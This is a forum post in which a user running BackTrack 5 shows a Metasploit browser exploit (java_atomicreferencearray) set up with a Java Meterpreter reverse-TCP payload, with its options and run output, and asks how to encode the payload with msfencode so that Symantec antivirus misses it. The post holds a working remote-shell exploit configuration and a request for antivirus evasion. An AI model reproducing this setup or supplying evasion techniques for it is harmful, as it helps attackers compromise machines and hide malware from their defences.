Hello all,

I have a question about evading AV with a JavaScript payload. Here is my situation:

I am running BT 5. uname is -
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

I have updated BT with msfupdate. I am using the 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I don't have any problems running this exploit, but when the client connects, the payload is picked up by Symantec antivirus as 'Trojan.Maljava!gen22'

Here are the exploit options:
msf exploit(java_atomicreferencearray) > show options
Module options (exploit/multi/browser/java_atomicreferencearray):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST                      yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     javasploit       no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Here is the output when the exploit is run:
msf exploit(java_atomicreferencearray) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
msf exploit(java_atomicreferencearray) >
[*] Server started.
[*] java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] java_atomicreferencearray - Generated jar to drop (5287 bytes).
[*] java_atomicreferencearray - Sending jar
[*] java_atomicreferencearray - Sending jar
[*] java_atomicreferencearray - Sending jar

I have tried using some of the 'evasion' options within the java exploit but have not had any success. My question is - is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. Thanks in advance!